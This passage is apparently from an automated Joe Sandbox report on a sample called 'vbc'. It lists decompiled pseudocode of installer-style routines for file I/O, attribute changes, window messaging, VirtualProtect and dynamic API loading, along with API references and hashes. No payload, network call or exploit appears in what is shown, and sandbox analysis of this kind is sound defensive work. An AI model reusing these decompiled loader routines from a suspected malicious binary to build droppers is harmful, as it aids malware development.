                                                					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                				}
                                                				_t5 = E0040689A(_t8); // executed
                                                				if(_t5 == 0) {
                                                					return 0;
                                                				}
                                                				goto L2;
                                                			}





                                                0x00406912
                                                0x00406915
                                                0x0040691c
                                                0x00406924
                                                0x00406930
                                                0x00000000
                                                0x00406937
                                                0x00406927
                                                0x0040692e
                                                0x00000000
                                                0x0040693f
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                				signed int _t5;
                                                				void* _t6;
                                                
                                                				_t5 = GetFileAttributesW(_a4); // executed
                                                				asm("sbb ecx, ecx");
                                                				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                				return _t6;
                                                			}





                                                0x00406031
                                                0x0040603e
                                                0x00406053
                                                0x00406059

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406008(WCHAR* _a4) {
                                                				signed char _t3;
                                                				signed char _t7;
                                                
                                                				_t3 = GetFileAttributesW(_a4); // executed
                                                				_t7 = _t3;
                                                				if(_t7 != 0xffffffff) {
                                                					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                				}
                                                				return _t7;
                                                			}





                                                0x0040600d
                                                0x00406013
                                                0x00406018
                                                0x00406021
                                                0x00406021
                                                0x0040602a

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405AEB(WCHAR* _a4) {
                                                				int _t2;
                                                
                                                				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                				if(_t2 == 0) {
                                                					return GetLastError();
                                                				}
                                                				return 0;
                                                			}




                                                0x00405af1
                                                0x00405af9
                                                0x00000000
                                                0x00405aff
                                                0x00000000

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                • GetLastError.KERNEL32 ref: 00405AFF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004060DF(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x004060e3
                                                0x004060f3
                                                0x004060fb
                                                0x00000000
                                                0x00406102
                                                0x00000000
                                                0x00406104

                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060F3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004060B0(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x004060b4
                                                0x004060c4
                                                0x004060cc
                                                0x00000000
                                                0x004060d3
                                                0x00000000
                                                0x004060d5

                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060C4
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                
                                                				 *0x73195048 = _a4;
                                                				if(_a8 == 1) {
                                                					VirtualProtect(0x7319505c, 4, 0x40, 0x7319504c); // executed
                                                					 *0x7319505c = 0xc2;
                                                					 *0x7319504c = 0;
                                                					 *0x73195054 = 0;
                                                					 *0x73195068 = 0;
                                                					 *0x73195058 = 0;
                                                					 *0x73195050 = 0;
                                                					 *0x73195060 = 0;
                                                					 *0x7319505e = 0;
                                                				}
                                                				return 1;
                                                			}



                                                0x73192a88
                                                0x73192a8d
                                                0x73192a9d
                                                0x73192aa5
                                                0x73192aac
                                                0x73192ab1
                                                0x73192ab6
                                                0x73192abb
                                                0x73192ac0
                                                0x73192ac5
                                                0x73192aca
                                                0x73192aca
                                                0x73192ad2

                                                APIs
                                                • VirtualProtect.KERNELBASE(7319505C,00000004,00000040,7319504C), ref: 73192A9D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680955467.0000000073191000.00000020.00000001.01000000.00000004.sdmp, Offset: 73190000, based on PE: true
                                                • Associated: 00000004.00000002.680948427.0000000073190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680961588.0000000073194000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680965648.0000000073196000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73190000_vbc.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 5e61161749a6079763eccc3801a4f171e7fe2b3a7a640898b70d5183a587ebcd
                                                • Instruction ID: 73dfa309b4a19f9682ff7397a3bed0a450cc85722a7454f52b147c843180b5f6
                                                • Opcode Fuzzy Hash: 5e61161749a6079763eccc3801a4f171e7fe2b3a7a640898b70d5183a587ebcd
                                                • Instruction Fuzzy Hash: 76F07FF29052C0DED358EF2B84657093FE0A709609B2E466AB19CF6241E33440469BB5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044E5(int _a4) {
                                                				struct HWND__* _t2;
                                                				long _t3;
                                                
                                                				_t2 =  *0x433ed8;
                                                				if(_t2 != 0) {
                                                					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                					return _t3;
                                                				}
                                                				return _t2;
                                                			}





                                                0x004044e5
                                                0x004044ec
                                                0x004044f7
                                                0x00000000
                                                0x004044f7
                                                0x004044fd

                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044CE(int _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                				return _t2;
                                                			}




                                                0x004044dc
                                                0x004044e2

                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004034E5(long _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                				return _t2;
                                                			}




                                                0x004034f3
                                                0x004034f9

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044BB(int _a4) {
                                                				int _t2;
                                                
                                                				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                				return _t2;
                                                			}




                                                0x004044c5
                                                0x004044cb

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E73192B98(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				void* _t28;
                                                				void* _t29;
                                                				int _t33;
                                                				void* _t37;
                                                				void* _t40;
                                                				void* _t45;
                                                				void* _t49;
                                                				signed int _t56;
                                                				void* _t61;
                                                				void* _t70;
                                                				intOrPtr _t72;
                                                				signed int _t77;
                                                				intOrPtr _t79;
                                                				intOrPtr _t80;
                                                				void* _t81;
                                                				void* _t87;
                                                				void* _t88;
                                                				void* _t89;
                                                				void* _t90;
                                                				intOrPtr _t93;
                                                				intOrPtr _t94;
                                                
                                                				if( *0x73195050 != 0 && E73192ADB(_a4) == 0) {
                                                					 *0x73195054 = _t93;
                                                					if( *0x7319504c != 0) {
                                                						_t93 =  *0x7319504c;
                                                					} else {
                                                						E731930C0(E73192AD5(), __ecx);
                                                						 *0x7319504c = _t93;
                                                					}
                                                				}
                                                				_t28 = E73192B09(_a4);
                                                				_t94 = _t93 + 4;
                                                				if(_t28 <= 0) {
                                                					L9:
                                                					_t29 = E73192AFD();
                                                					_t72 = _a4;
                                                					_t79 =  *0x73195058;
                                                					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                					 *0x73195058 = _t72;
                                                					E73192AF7();
                                                					_t33 = CloseHandle(??); // executed
                                                					 *0x73195034 = _t33;
                                                					 *0x73195038 = _t79;
                                                					if( *0x73195050 != 0 && E73192ADB( *0x73195058) == 0) {
                                                						 *0x7319504c = _t94;
                                                						_t94 =  *0x73195054;
                                                					}
                                                					_t80 =  *0x73195058;
                                                					_a4 = _t80;
                                                					 *0x73195058 =  *((intOrPtr*)(E73192AFD() + _t80));
                                                					_t37 = E73192AE9(_t80);
                                                					_pop(_t81);
                                                					if(_t37 != 0) {
                                                						_t40 = E73192B09(_t81);
                                                						if(_t40 > 0) {
                                                							_push(_t40);
                                                							_push(E73192B14() + _a4 + _v8);
                                                							_push(E73192B1E());
                                                							if( *0x73195050 <= 0 || E73192ADB(_a4) != 0) {
                                                								_pop(_t88);
                                                								_pop(_t45);
                                                								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                								if(__eflags == 0) {
                                                								}
                                                								asm("loop 0xfffffff5");
                                                							} else {
                                                								_pop(_t89);
                                                								_pop(_t49);
                                                								 *0x7319504c =  *0x7319504c +  *(_t89 + _t49) * 4;
                                                								asm("loop 0xffffffeb");
                                                							}
                                                						}
                                                					}
                                                					_t107 =  *0x73195058;
                                                					if( *0x73195058 == 0) {
                                                						 *0x7319504c = 0;
                                                					}
                                                					E73192B42(_t107, _a4,  *0x73195034,  *0x73195038);
                                                					return _a4;
                                                				}
                                                				_push(E73192B14() + _a4);
                                                				_t56 = E73192B1A();
                                                				_v8 = _t56;
                                                				_t77 = _t28;
                                                				_push(_t68 + _t56 * _t77);
                                                				_t70 = E73192B26();
                                                				_t87 = E73192B22();
                                                				_t90 = E73192B1E();
                                                				_t61 = _t77;
                                                				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                					_push( *((intOrPtr*)(_t70 + _t61)));
                                                				}
                                                				_push( *((intOrPtr*)(_t87 + _t61)));
                                                				asm("loop 0xfffffff1");
                                                				goto L9;
                                                			}

























                                                0x73192ba8
                                                0x73192bb9
                                                0x73192bc6
                                                0x73192bda
                                                0x73192bc8
                                                0x73192bcd
                                                0x73192bd2
                                                0x73192bd2
                                                0x73192bc6
                                                0x73192be3
                                                0x73192be8
                                                0x73192bee
                                                0x73192c32
                                                0x73192c32
                                                0x73192c37
                                                0x73192c3c
                                                0x73192c42
                                                0x73192c44
                                                0x73192c4a
                                                0x73192c57
                                                0x73192c59
                                                0x73192c5e
                                                0x73192c6b
                                                0x73192c7e
                                                0x73192c84
                                                0x73192c8a
                                                0x73192c8b
                                                0x73192c91
                                                0x73192c9d
                                                0x73192ca3
                                                0x73192cab
                                                0x73192cac
                                                0x73192caf
                                                0x73192cba
                                                0x73192cbc
                                                0x73192cc8
                                                0x73192cce
                                                0x73192cd6
                                                0x73192d02
                                                0x73192d03
                                                0x73192d05
                                                0x73192d09
                                                0x73192d09
                                                0x73192d10
                                                0x73192ce6
                                                0x73192ce6
                                                0x73192ce7
                                                0x73192cf5
                                                0x73192cfe
                                                0x73192cfe
                                                0x73192cd6
                                                0x73192cba
                                                0x73192d12
                                                0x73192d19
                                                0x73192d1b
                                                0x73192d1b
                                                0x73192d34
                                                0x73192d42
                                                0x73192d42
                                                0x73192bf9
                                                0x73192bfa
                                                0x73192bff
                                                0x73192c03
                                                0x73192c08
                                                0x73192c1c
                                                0x73192c1d
                                                0x73192c1e
                                                0x73192c20
                                                0x73192c25
                                                0x73192c27
                                                0x73192c27
                                                0x73192c2a
                                                0x73192c30
                                                0x00000000

                                                APIs
                                                • CloseHandle.KERNELBASE(00000000), ref: 73192C57
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680955467.0000000073191000.00000020.00000001.01000000.00000004.sdmp, Offset: 73190000, based on PE: true
                                                • Associated: 00000004.00000002.680948427.0000000073190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680961588.0000000073194000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680965648.0000000073196000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73190000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 2645545cf012d76436299b14720adf7c6c685c4a3ccf69f6bfd84677ae74e8b1
                                                • Instruction ID: b705a579edb3f893881f92efed7160c8f0b52346c00de71629b98543775ebb1e
